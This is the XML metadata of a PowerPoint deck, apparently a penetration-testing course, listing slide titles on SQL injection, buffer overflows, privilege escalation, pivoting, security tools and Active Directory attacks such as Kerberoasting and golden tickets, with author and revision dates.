      <vt:lpstr>SQL Injection Part 2</vt:lpstr>
      <vt:lpstr>SQL Injection Part 3</vt:lpstr>
      <vt:lpstr>Basic Union Statement</vt:lpstr>
      <vt:lpstr>Basic Union Example</vt:lpstr>
      <vt:lpstr>Basic Union Example</vt:lpstr>
      <vt:lpstr>Easy(er) Mode: SQLMap</vt:lpstr>
      <vt:lpstr>Blind SQLi Example</vt:lpstr>
      <vt:lpstr>Wrap Up</vt:lpstr>
      <vt:lpstr>Closing Thoughts</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 3: Buffer Overflows</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Buffer Overflow Overview</vt:lpstr>
      <vt:lpstr>Memory Overview - Registers</vt:lpstr>
      <vt:lpstr>Buffer Overflows – A Visual (view in slideshow mode for animation)</vt:lpstr>
      <vt:lpstr>Checklist 1/2</vt:lpstr>
      <vt:lpstr>Checklist 2/2</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Immunity Overview</vt:lpstr>
      <vt:lpstr>Walkthrough Backup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4: Public Exploits and Scripting</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Public Exploits – Cautions and Advice</vt:lpstr>
      <vt:lpstr>Finding Exploits - Searchsploit</vt:lpstr>
      <vt:lpstr>Searchsploit – Searching and Filtering</vt:lpstr>
      <vt:lpstr>Searchsploit – Title Filtering</vt:lpstr>
      <vt:lpstr>Searchsploit – Term Filtering</vt:lpstr>
      <vt:lpstr>Searchsploit – Using Exploits</vt:lpstr>
      <vt:lpstr>Finding Exploits - Exploit-DB</vt:lpstr>
      <vt:lpstr>Finding Exploits - Metasploit</vt:lpstr>
      <vt:lpstr>Finding Exploits - Metasploit</vt:lpstr>
      <vt:lpstr>Finding Exploits – Google (duh!)</vt:lpstr>
      <vt:lpstr>Scripting Primer</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>When Should I Script?</vt:lpstr>
      <vt:lpstr>Programming Basics</vt:lpstr>
      <vt:lpstr>Variables</vt:lpstr>
      <vt:lpstr>Functions (AKA Methods)</vt:lpstr>
      <vt:lpstr>Scope Example - Python</vt:lpstr>
      <vt:lpstr>Conditionals (If / Else)</vt:lpstr>
      <vt:lpstr>Conditionals - PowerShell</vt:lpstr>
      <vt:lpstr>Loops</vt:lpstr>
      <vt:lpstr>Bash Loops</vt:lpstr>
      <vt:lpstr>PowerShell Loops</vt:lpstr>
      <vt:lpstr>Python Loops</vt:lpstr>
      <vt:lpstr>Some Bonus Loop Info</vt:lpstr>
      <vt:lpstr>A Final Note: Quotation Marks</vt:lpstr>
      <vt:lpstr>Example: Open Net Admin</vt:lpstr>
      <vt:lpstr>A Note On OpenNetAdmin Shell Script</vt:lpstr>
      <vt:lpstr>PowerShell Port Scanner</vt:lpstr>
      <vt:lpstr>Python Splitter</vt:lpstr>
      <vt:lpstr>Python Splitter Continued</vt:lpstr>
      <vt:lpstr>That’s a Wrap</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 5: Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>General Philosophy</vt:lpstr>
      <vt:lpstr>Tool Options</vt:lpstr>
      <vt:lpstr>linPEAS vs LinEnum</vt:lpstr>
      <vt:lpstr>Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Who Am I?</vt:lpstr>
      <vt:lpstr>Who Am I? (Continued)</vt:lpstr>
      <vt:lpstr>Where Am I?</vt:lpstr>
      <vt:lpstr>Where Am I? (Continued)</vt:lpstr>
      <vt:lpstr>Where Am I? (Continued)</vt:lpstr>
      <vt:lpstr>Kernel Exploits – A Note</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>Am I Alone?</vt:lpstr>
      <vt:lpstr>Am I Alone? (Continued)</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket?</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket? (Continued)</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket? (Continued)</vt:lpstr>
      <vt:lpstr>SUID Binaries – A Note</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket? (Continued)</vt:lpstr>
      <vt:lpstr>Wrap-Up</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 6: Windows Privilege Escalation</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>General Philosophy</vt:lpstr>
      <vt:lpstr>Tool Options</vt:lpstr>
      <vt:lpstr>Windows Privilege Escalation</vt:lpstr>
      <vt:lpstr>Who Am I?</vt:lpstr>
      <vt:lpstr>Who Am I? (Continued)</vt:lpstr>
      <vt:lpstr>Where Am I?</vt:lpstr>
      <vt:lpstr>Where Am I? (Continued)</vt:lpstr>
      <vt:lpstr>Kernel Exploits – A Note</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>What’s Going On?</vt:lpstr>
      <vt:lpstr>Am I Alone?</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket?</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket? (Continued)</vt:lpstr>
      <vt:lpstr>What Do I Have in My Pocket? – Registry Example</vt:lpstr>
      <vt:lpstr>Special Note: UAC</vt:lpstr>
      <vt:lpstr>Special Note: Unquoted Service Paths</vt:lpstr>
      <vt:lpstr>Other Things to be Aware of</vt:lpstr>
      <vt:lpstr>Wrap-Up</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 7: Port Forwarding and Pivoting</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>When To Use Redirection</vt:lpstr>
      <vt:lpstr>Example Setup</vt:lpstr>
      <vt:lpstr>The Goal</vt:lpstr>
      <vt:lpstr>VMWare Setup</vt:lpstr>
      <vt:lpstr>A Note on Coloring</vt:lpstr>
      <vt:lpstr>SSH Port Forwarding</vt:lpstr>
      <vt:lpstr>Local Port Forwarding</vt:lpstr>
      <vt:lpstr>Syntax</vt:lpstr>
      <vt:lpstr>Example – Local Port Open</vt:lpstr>
      <vt:lpstr>Example – Distant Host in Subnet </vt:lpstr>
      <vt:lpstr>Remote Port Forwarding</vt:lpstr>
      <vt:lpstr>Syntax</vt:lpstr>
      <vt:lpstr>Example – Local Port Open</vt:lpstr>
      <vt:lpstr>Example – Distant Host in Subnet </vt:lpstr>
      <vt:lpstr>Dynamic Port Forwarding</vt:lpstr>
      <vt:lpstr>Syntax</vt:lpstr>
      <vt:lpstr>Example – Nmap Distant Host via Jump Box</vt:lpstr>
      <vt:lpstr>You can even use your browser!</vt:lpstr>
      <vt:lpstr>But… What if there’s no SSH client?</vt:lpstr>
      <vt:lpstr>Chisel Syntax/Example</vt:lpstr>
      <vt:lpstr>Easy Mode: Metasploit</vt:lpstr>
      <vt:lpstr>Autoroute</vt:lpstr>
      <vt:lpstr>Proxy Server</vt:lpstr>
      <vt:lpstr>Running via Proxychains</vt:lpstr>
      <vt:lpstr>Wrap Up</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 8: Know Your Tools</vt:lpstr>
      <vt:lpstr>Updating Kali</vt:lpstr>
      <vt:lpstr>Environment Setup</vt:lpstr>
      <vt:lpstr>SSH Configuration</vt:lpstr>
      <vt:lpstr>Impacket SMBServer</vt:lpstr>
      <vt:lpstr>Updog</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit In Action</vt:lpstr>
      <vt:lpstr>Metasploit In Action</vt:lpstr>
      <vt:lpstr>Metasploit In Action</vt:lpstr>
      <vt:lpstr>Metasploit In Action</vt:lpstr>
      <vt:lpstr>Metasploit In Action</vt:lpstr>
      <vt:lpstr>Metasploit in Action</vt:lpstr>
      <vt:lpstr>msfvenom</vt:lpstr>
      <vt:lpstr>evil-winrm</vt:lpstr>
      <vt:lpstr>PSExec</vt:lpstr>
      <vt:lpstr>tmux</vt:lpstr>
      <vt:lpstr>tmux example</vt:lpstr>
      <vt:lpstr>wireshark – GUI-based Traffic Analyzer</vt:lpstr>
      <vt:lpstr>wireshark continued</vt:lpstr>
      <vt:lpstr>wireshark Resources</vt:lpstr>
      <vt:lpstr>burpsuite</vt:lpstr>
      <vt:lpstr>foxyproxy</vt:lpstr>
      <vt:lpstr>onesixtyone / snmpwalk</vt:lpstr>
      <vt:lpstr>nc / nc.exe</vt:lpstr>
      <vt:lpstr>More nc examples</vt:lpstr>
      <vt:lpstr>curl</vt:lpstr>
      <vt:lpstr>Password Cracking</vt:lpstr>
      <vt:lpstr>Wordlists</vt:lpstr>
      <vt:lpstr>hash-identifier</vt:lpstr>
      <vt:lpstr>john (short for John the Ripper)</vt:lpstr>
      <vt:lpstr>hashcat</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Active Directory</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Lab Setup</vt:lpstr>
      <vt:lpstr>AD Overview</vt:lpstr>
      <vt:lpstr>Key Components</vt:lpstr>
      <vt:lpstr>Enumerating AD</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Authentication in AD</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>A Quick Word on Hashes</vt:lpstr>
      <vt:lpstr>NTLM</vt:lpstr>
      <vt:lpstr>Kerberos</vt:lpstr>
      <vt:lpstr>Step 1 – AS-REQ (Authentication Service Request)</vt:lpstr>
      <vt:lpstr>Step 2 – AS-REP (Authentication Service Response)</vt:lpstr>
      <vt:lpstr>Step 3 – TGS-REQ (Ticket Granting Service Request)</vt:lpstr>
      <vt:lpstr>Step 4 – TGS-REP (Ticket Graning Service Response)</vt:lpstr>
      <vt:lpstr>Step 5 – AP-REQ (Application Request)</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Kerberoasting</vt:lpstr>
      <vt:lpstr>Roasting the 3-headed dog</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Gathering Hashes</vt:lpstr>
      <vt:lpstr>All Hail the Hash</vt:lpstr>
      <vt:lpstr>Mimikatz</vt:lpstr>
      <vt:lpstr>Examples – logon passwords</vt:lpstr>
      <vt:lpstr>Examples – logon passwords – Sometimes you get lucky</vt:lpstr>
      <vt:lpstr>Example - Tickets</vt:lpstr>
      <vt:lpstr>Mimikatz via Metasploit</vt:lpstr>
      <vt:lpstr>Using Hashes and Tickets</vt:lpstr>
      <vt:lpstr>Pass the Hash</vt:lpstr>
      <vt:lpstr>Example - CME</vt:lpstr>
      <vt:lpstr>Example - PSExec</vt:lpstr>
      <vt:lpstr>Overpass the Hash</vt:lpstr>
      <vt:lpstr>Example – Over-pass the hash</vt:lpstr>
      <vt:lpstr>Silver Tickets</vt:lpstr>
      <vt:lpstr>Quick Aside - NTHashes</vt:lpstr>
      <vt:lpstr>Silver Tickets in Action</vt:lpstr>
      <vt:lpstr>Beyond OSCP</vt:lpstr>
      <vt:lpstr>DCSync</vt:lpstr>
      <vt:lpstr>DCSync Example</vt:lpstr>
      <vt:lpstr>Golden Ticket</vt:lpstr>
      <vt:lpstr>Golden Ticket Syntax</vt:lpstr>
      <vt:lpstr>Golden Ticket Example</vt:lpstr>
      <vt:lpstr>Notional Attack Path</vt:lpstr>
      <vt:lpstr>Step 1 - Access</vt:lpstr>
      <vt:lpstr>Step 2 – Gather Credentials</vt:lpstr>
      <vt:lpstr>Step 3 – Use CME</vt:lpstr>
      <vt:lpstr>Step 3 – Use CME</vt:lpstr>
      <vt:lpstr>Step 3 – Use CME</vt:lpstr>
      <vt:lpstr>Wrap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Fundamentals</dc:title>
  <dc:creator>Brent Harrell</dc:creator>
  <cp:lastModifiedBy>sc0tch</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-05T19:15:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-17T15:26:14Z</dcterms:modified>
</cp:coreProperties>
</file>